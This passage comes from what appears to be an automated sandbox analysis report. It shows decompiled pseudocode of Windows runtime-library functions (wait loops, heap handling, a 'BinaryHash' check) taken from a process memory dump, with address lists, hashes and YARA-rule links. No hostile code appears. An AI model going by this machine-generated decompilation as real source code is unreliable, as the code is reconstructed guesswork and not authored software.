				_v28 = _t104;
				L9:
				while(1) {
					if(E04B67D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E04BDFE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04B89520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E04B7E18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L04B9DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4c36901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4c36901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04B89980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E04B895D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04B67D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04B67D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04BC7016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E04BDFDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
							__eflags = 0;
						} else {
							_t106 =  *(_t105 + 0x14);
						}
						__eflags = _t67 - 2;
						if(_t67 > 2) {
							__eflags = _t109 - 0x4c35350;
							if(_t109 != 0x4c35350) {
								__eflags = _t106 - _v20;
								if(__eflags == 0) {
									_t93 = _t109;
									E04BDFFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
								}
							}
						}
						_push("RTL: Re-Waiting\n");
						_push(0);
						_push(0x65);
						_v20 = _t106;
						E04BD5720();
						_t104 = _v28;
						_t116 = _t116 + 0xc;
						continue;
					}
				}
			}




































                                                    0x04b42d8a
                                                    0x04b42d8a
                                                    0x04b42d92
                                                    0x04b42d96
                                                    0x04b42d9e
                                                    0x04b42da0
                                                    0x04b42da3
                                                    0x04b42da5
                                                    0x04b42da8
                                                    0x04b42dab
                                                    0x04b42db2
                                                    0x04b9f9aa
                                                    0x04b9f9ab
                                                    0x04b9f9ae
                                                    0x04b9f9ae
                                                    0x04b42db8
                                                    0x04b42dc2
                                                    0x04b9f9b9
                                                    0x04b9f9be
                                                    0x04b9f9bf
                                                    0x04b9f9bf
                                                    0x04b42dcf
                                                    0x04b9f9c9
                                                    0x04b42dd5
                                                    0x04b42dd5
                                                    0x04b42dd5
                                                    0x04b42dde
                                                    0x04b42de1
                                                    0x04b42e70
                                                    0x04b42e72
                                                    0x04b42e72
                                                    0x04b42de7
                                                    0x04b42deb
                                                    0x04b42e7c
                                                    0x04b42e83
                                                    0x04b42e85
                                                    0x04b42e8b
                                                    0x04b42e8d
                                                    0x04b42e92
                                                    0x04b42e92
                                                    0x04b42e85
                                                    0x04b42df1
                                                    0x04b42df7
                                                    0x04b42df9
                                                    0x04b42df9
                                                    0x04b42dfc
                                                    0x04b42dff
                                                    0x04b42e02
                                                    0x00000000
                                                    0x04b42e05
                                                    0x04b42e0c
                                                    0x04b9f9d9
                                                    0x04b42e12
                                                    0x04b42e12
                                                    0x04b42e12
                                                    0x04b42e1a
                                                    0x04b9f9e3
                                                    0x04b9f9e9
                                                    0x04b9f9f0
                                                    0x04b9f9f6
                                                    0x04b9f9f8
                                                    0x04b9f9f8
                                                    0x04b9f9f0
                                                    0x04b42e23
                                                    0x04b9fa02
                                                    0x04b9fa03
                                                    0x04b9fa05
                                                    0x04b9fa06
                                                    0x00000000
                                                    0x04b42e29
                                                    0x04b42e29
                                                    0x04b42e2e
                                                    0x04b42e34
                                                    0x04b42e3e
                                                    0x00000000
                                                    0x00000000
                                                    0x04b42e44
                                                    0x04b42e47
                                                    0x04b42e4d
                                                    0x00000000
                                                    0x00000000
                                                    0x04b42e4f
                                                    0x04b42e54
                                                    0x00000000
                                                    0x00000000
                                                    0x04b42e5a
                                                    0x04b42e5f
                                                    0x04b42e9a
                                                    0x04b42ea4
                                                    0x04b42ea5
                                                    0x04b42ea8
                                                    0x04b42eaf
                                                    0x04b42eb2
                                                    0x04b42eb5
                                                    0x04b9fae9
                                                    0x04b9faeb
                                                    0x04b9faed
                                                    0x04b9faef
                                                    0x04b9faf7
                                                    0x04b9faf8
                                                    0x04b9fafd
                                                    0x04b9faff
                                                    0x04b9fb04
                                                    0x04b9fb04
                                                    0x04b9faff
                                                    0x04b42ec0
                                                    0x04b42ec4
                                                    0x04b42ec6
                                                    0x04b42ec8
                                                    0x04b9fb14
                                                    0x04b9fb18
                                                    0x04b9fb1e
                                                    0x04b9fb21
                                                    0x04b9fb21
                                                    0x04b42ece
                                                    0x04b42ece
                                                    0x04b42ece
                                                    0x04b42ed7
                                                    0x04b42e61
                                                    0x04b42e63
                                                    0x04b9fa6b
                                                    0x04b9fa71
                                                    0x04b9fa76
                                                    0x04b9fa78
                                                    0x04b9fa8a
                                                    0x04b9fa7a
                                                    0x04b9fa83
                                                    0x04b9fa83
                                                    0x04b9fa8f
                                                    0x04b9fa91
                                                    0x04b9fa97
                                                    0x04b9fa9d
                                                    0x04b9faa4
                                                    0x04b9faaa
                                                    0x04b9faaf
                                                    0x04b9fab1
                                                    0x04b9fac3
                                                    0x04b9fab3
                                                    0x04b9fabc
                                                    0x04b9fabc
                                                    0x04b9fac8
                                                    0x04b9facb
                                                    0x04b9fadf
                                                    0x04b9fadf
                                                    0x04b9facb
                                                    0x04b9faa4
                                                    0x04b9fa91
                                                    0x04b42e6f
                                                    0x04b42e6f
                                                    0x04b42e5f
                                                    0x04b9fa13
                                                    0x04b9fa15
                                                    0x04b9fa17
                                                    0x04b9fa1f
                                                    0x04b9fa21
                                                    0x04b9fa22
                                                    0x04b9fa25
                                                    0x04b9fa28
                                                    0x04b9fa2f
                                                    0x04b9fa2f
                                                    0x04b9fa2a
                                                    0x04b9fa2a
                                                    0x04b9fa2a
                                                    0x04b9fa31
                                                    0x04b9fa34
                                                    0x04b9fa36
                                                    0x04b9fa3c
                                                    0x04b9fa3e
                                                    0x04b9fa41
                                                    0x04b9fa43
                                                    0x04b9fa45
                                                    0x04b9fa45
                                                    0x04b9fa41
                                                    0x04b9fa3c
                                                    0x04b9fa4a
                                                    0x04b9fa4f
                                                    0x04b9fa51
                                                    0x04b9fa53
                                                    0x04b9fa56
                                                    0x04b9fa5b
                                                    0x04b9fa5e
                                                    0x00000000
                                                    0x04b9fa5e
                                                    0x04b42e23

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Re-Waiting
                                                    • API String ID: 0-316354757
                                                    • Opcode ID: 8404fa1235f54511eaad5ccad0b004fa34c76d5fed1eab88fc5d8479d6fa393d
                                                    • Instruction ID: c0e337bc88822c857d8f829694a149f506d9aba750a548089cad572d78c23efe
                                                    • Opcode Fuzzy Hash: 8404fa1235f54511eaad5ccad0b004fa34c76d5fed1eab88fc5d8479d6fa393d
                                                    • Instruction Fuzzy Hash: DB61E171A00604ABEB25DF68C880B7E77F5EB84768F144AE9E411972C0DB74BE01B791
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C10EA5, Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 80%
                                                    			E04C10EA5(void* __ecx, void* __edx) {
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				unsigned int _v32;
				signed int _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v64;
				void* __ebx;
				void* __edi;
				signed int _t58;
				unsigned int _t60;
				intOrPtr _t62;
				char* _t67;
				char* _t69;
				void* _t80;
				void* _t83;
				intOrPtr _t93;
				intOrPtr _t115;
				char _t117;
				void* _t120;

				_t83 = __edx;
				_t117 = 0;
				_t120 = __ecx;
				_v44 = 0;
				if(E04C0FF69(__ecx,  &_v44,  &_v32) < 0) {
					L24:
					_t109 = _v44;
					if(_v44 != 0) {
						E04C11074(_t83, _t120, _t109, _t117, _t117);
					}
					L26:
					return _t117;
				}
				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
				_t5 = _t83 + 1; // 0x1
				_v36 = _t5 << 0xc;
				_v40 = _t93;
				_t58 =  *(_t93 + 0xc) & 0x40000000;
				asm("sbb ebx, ebx");
				_t83 = ( ~_t58 & 0x0000003c) + 4;
				if(_t58 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t93);
					_push(0xffffffff);
					_t80 = E04B89730();
					_t115 = _v64;
					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
						_push(_t93);
						E04C0A80D(_t115, 1, _v20, _t117);
						_t83 = 4;
					}
				}
				if(E04C0A854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
					goto L24;
				}
				_t60 = _v32;
				_t97 = (_t60 != 0x100000) + 1;
				_t83 = (_v44 -  *0x4c38b04 >> 0x14) + (_v44 -  *0x4c38b04 >> 0x14);
				_v28 = (_t60 != 0x100000) + 1;
				_t62 = _t83 + (_t60 >> 0x14) * 2;
				_v40 = _t62;
				if(_t83 >= _t62) {
					L10:
					asm("lock xadd [eax], ecx");
					asm("lock xadd [eax], ecx");
					if(E04B67D50() == 0) {
						_t67 = 0x7ffe0380;
					} else {
						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E04C0138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
					}
					if(E04B67D50() == 0) {
						_t69 = 0x7ffe0388;
					} else {
						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
					}
					if( *_t69 != 0) {
						E04BFFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
					}
					if(( *0x4c38724 & 0x00000008) != 0) {
						E04C052F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
					}
					_t117 = _v44;
					goto L26;
				}
				while(E04C115B5(0x4c38ae4, _t83, _t97, _t97) >= 0) {
					_t97 = _v28;
					_t83 = _t83 + 2;
					if(_t83 < _v40) {
						continue;
					}
					goto L10;
				}
				goto L24;
			}
























                                                    0x04c10eb7
                                                    0x04c10eb9
                                                    0x04c10ec0
                                                    0x04c10ec2
                                                    0x04c10ecd
                                                    0x04c1105b
                                                    0x04c1105b
                                                    0x04c11061
                                                    0x04c11066
                                                    0x04c11066
                                                    0x04c1106b
                                                    0x04c11073
                                                    0x04c11073
                                                    0x04c10ed3
                                                    0x04c10ed6
                                                    0x04c10edc
                                                    0x04c10ee0
                                                    0x04c10ee7
                                                    0x04c10ef0
                                                    0x04c10ef5
                                                    0x04c10efa
                                                    0x04c10efc
                                                    0x04c10efd
                                                    0x04c10f03
                                                    0x04c10f04
                                                    0x04c10f06
                                                    0x04c10f07
                                                    0x04c10f09
                                                    0x04c10f0e
                                                    0x04c10f14
                                                    0x04c10f23
                                                    0x04c10f2d
                                                    0x04c10f34
                                                    0x04c10f34
                                                    0x04c10f14
                                                    0x04c10f52
                                                    0x00000000
                                                    0x00000000
                                                    0x04c10f58
                                                    0x04c10f73
                                                    0x04c10f74
                                                    0x04c10f79
                                                    0x04c10f7d
                                                    0x04c10f80
                                                    0x04c10f86
                                                    0x04c10fab
                                                    0x04c10fb5
                                                    0x04c10fc6
                                                    0x04c10fd1
                                                    0x04c10fe3
                                                    0x04c10fd3
                                                    0x04c10fdc
                                                    0x04c10fdc
                                                    0x04c10feb
                                                    0x04c11009
                                                    0x04c11009
                                                    0x04c11015
                                                    0x04c11027
                                                    0x04c11017
                                                    0x04c11020
                                                    0x04c11020
                                                    0x04c1102f
                                                    0x04c1103c
                                                    0x04c1103c
                                                    0x04c11048
                                                    0x04c11050
                                                    0x04c11050
                                                    0x04c11055
                                                    0x00000000
                                                    0x04c11055
                                                    0x04c10f88
                                                    0x04c10f9e
                                                    0x04c10fa2
                                                    0x04c10fa9
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x04c10fa9
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: `
                                                    • API String ID: 0-2679148245
                                                    • Opcode ID: ab7937efd89e01b0f3bf3341e9b7622c42fc3faa61ba6a2248b25016d0954303
                                                    • Instruction ID: 05aeda93b1767e126480da098cc9851055cb329eda7658b26236e10feb0d3e69
                                                    • Opcode Fuzzy Hash: ab7937efd89e01b0f3bf3341e9b7622c42fc3faa61ba6a2248b25016d0954303
                                                    • Instruction Fuzzy Hash: 4F51E2702043419FE324DF29D884B2BB7E6EBC9308F08492DF586876A0DB75F945DB62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04B7F0BF, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E04B7F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E04B64120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E04B89830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E04B89990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E04B895D0();
							goto L11;
						} else {
							_t109 = L04B64620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E04B8F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E04B895D0();
										L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                    0x04b7f0d3
                                                    0x04b7f0d9
                                                    0x04b7f0e0
                                                    0x04b7f0e7
                                                    0x04b7f0f2
                                                    0x04b7f0f4
                                                    0x04b7f0f8
                                                    0x04b7f100
                                                    0x04b7f108
                                                    0x04b7f10d
                                                    0x04b7f115
                                                    0x04b7f116
                                                    0x04b7f11f
                                                    0x04b7f123
                                                    0x04b7f124
                                                    0x04b7f12c
                                                    0x04b7f130
                                                    0x04b7f134
                                                    0x04b7f13d
                                                    0x04b7f144
                                                    0x04b7f14b
                                                    0x04b7f152
                                                    0x04bbbab0
                                                    0x04bbbab0
                                                    0x04b7f158
                                                    0x04b7f158
                                                    0x04b7f15a
                                                    0x04b7f160
                                                    0x04b7f165
                                                    0x04b7f166
                                                    0x04b7f16f
                                                    0x04b7f173
                                                    0x04bbbaa7
                                                    0x04bbbaa7
                                                    0x04bbbaab
                                                    0x00000000
                                                    0x04b7f179
                                                    0x04b7f18d
                                                    0x04b7f191
                                                    0x04bbbaa2
                                                    0x00000000
                                                    0x04b7f197
                                                    0x04b7f19b
                                                    0x04b7f1a2
                                                    0x04b7f1a9
                                                    0x04b7f1af
                                                    0x04b7f1b2
                                                    0x04b7f1b6
                                                    0x04b7f1b9
                                                    0x04b7f1c4
                                                    0x04b7f1d8
                                                    0x04b7f1df
                                                    0x04b7f1e3
                                                    0x04b7f1eb
                                                    0x04b7f1ee
                                                    0x04b7f1f4
                                                    0x04b7f20f
                                                    0x04bbbab7
                                                    0x04bbbabb
                                                    0x04bbbacc
                                                    0x04bbbad1
                                                    0x04b7f215
                                                    0x04b7f218
                                                    0x04b7f226
                                                    0x04b7f22b
                                                    0x00000000
                                                    0x04b7f22b
                                                    0x04b7f1f6
                                                    0x04b7f1f6
                                                    0x04b7f1f9
                                                    0x04b7f1fb
                                                    0x04b7f1fb
                                                    0x04b7f1f4
                                                    0x04b7f191
                                                    0x04b7f173
                                                    0x04b7f152
                                                    0x04b7f203

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @
                                                    • API String ID: 0-2766056989
                                                    • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                    • Instruction ID: 7c8f9e665360e2f8d138008d2594da26ec01139578731fa53be133ad9f85537f
                                                    • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                                    • Instruction Fuzzy Hash: 7551AE716047109FD320DF18C840A6BBBF8FF48754F00896DF9A687690E7B4E915CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04BC3540, Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 75%
                                                    			E04BC3540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x4c3d360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E04B80BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E04BC3706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E04B8FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E04BC3540;
						E04B8FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E04B9DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E04BD0C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E04B897C0();
					}
					return E04B8B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E04BC3971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E04BC3884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E04B8FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E04B89650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E04BC3787(_a4,  &_v352, _t80);
						}
					}
					L04B677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E04B895D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}































                                                    0x04bc3552
                                                    0x04bc355a
                                                    0x04bc355d
                                                    0x04bc3566
                                                    0x04bc3567
                                                    0x04bc357e
                                                    0x04bc358f
                                                    0x04bc35a1
                                                    0x04bc35a5
                                                    0x04bc366b
                                                    0x04bc366b
                                                    0x04bc366d
                                                    0x04bc3672
                                                    0x04bc3679
                                                    0x04bc3685
                                                    0x04bc368d
                                                    0x04bc369d
                                                    0x04bc36a7
                                                    0x04bc36b8
                                                    0x04bc36c6
                                                    0x04bc36c7
                                                    0x04bc36dc
                                                    0x04bc36e1
                                                    0x04bc36e7
                                                    0x04bc36e9
                                                    0x04bc36e9
                                                    0x04bc3703
                                                    0x04bc3703
                                                    0x04bc35b5
                                                    0x04bc35c0
                                                    0x04bc35c4
                                                    0x00000000
                                                    0x00000000
                                                    0x04bc35ca
                                                    0x04bc35d7
                                                    0x04bc35e2
                                                    0x04bc35e6
                                                    0x04bc35e8
                                                    0x04bc35f5
                                                    0x04bc35fa
                                                    0x04bc3603
                                                    0x04bc3604
                                                    0x04bc3609
                                                    0x04bc360a
                                                    0x04bc3612
                                                    0x04bc3613
                                                    0x04bc361e
                                                    0x04bc3622
                                                    0x04bc3628
                                                    0x04bc362f
                                                    0x04bc362f
                                                    0x04bc3636
                                                    0x04bc3638
                                                    0x04bc363b
                                                    0x04bc3642
                                                    0x04bc3642
                                                    0x04bc3636
                                                    0x04bc3657
                                                    0x04bc3657
                                                    0x04bc365c
                                                    0x04bc3662
                                                    0x04bc3669
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: BinaryHash
                                                    • API String ID: 2994545307-2202222882
                                                    • Opcode ID: a2cb327928e69cde024cae17d1b1bb1913ef1623034f83177c82b3d461ff8f1b
                                                    • Instruction ID: 0412f484d6dbab9d8c0f509a631ad732788f4211d5f43f9b371e20460933f481
                                                    • Opcode Fuzzy Hash: a2cb327928e69cde024cae17d1b1bb1913ef1623034f83177c82b3d461ff8f1b
                                                    • Instruction Fuzzy Hash: 634137B1D0452C9BEF21DA50CC80FEEB77C9B44718F4085E9AA19A7140DB30AE88CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04C105AC, Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 71%
                                                    			E04C105AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E04C107DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E04B89730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E04C0A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E04C0A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E04C11293(_t79, _v40, E04C107DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E04B67D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E04C0138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

















                                                    0x04c105c5
                                                    0x04c105ca
                                                    0x04c105d3
                                                    0x04c106db
                                                    0x04c106db
                                                    0x04c106dd
                                                    0x04c106e3
                                                    0x04c106e3
                                                    0x04c105dd
                                                    0x04c105e7
                                                    0x04c105f6
                                                    0x04c10600
                                                    0x04c10607
                                                    0x04c10610
                                                    0x04c10615
                                                    0x04c1061a
                                                    0x04c1061c
                                                    0x04c1061e
                                                    0x04c10624
                                                    0x04c10625
                                                    0x04c10627
                                                    0x04c10628
                                                    0x04c10631
                                                    0x04c10640
                                                    0x04c1064d
                                                    0x04c10654
                                                    0x04c10654
                                                    0x04c10631
                                                    0x04c1066d
                                                    0x04c10674
                                                    0x00000000
                                                    0x00000000
                                                    0x04c10692
                                                    0x04c1069e
                                                    0x04c106b0
                                                    0x04c106a0
                                                    0x04c106a9
                                                    0x04c106a9
                                                    0x04c106b8
                                                    0x04c106d6
                                                    0x04c106d6
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000A.00000002.616762528.0000000004B20000.00000040.00000001.sdmp, Offset: 04B20000, based on PE: true
                                                    • Associated: 0000000A.00000002.617248477.0000000004C3B000.00000040.00000001.sdmp Download File
                                                    • Associated: 0000000A.00000002.617273296.0000000004C3F000.00000040.00000001.sdmp Download File
                                                    Similarity
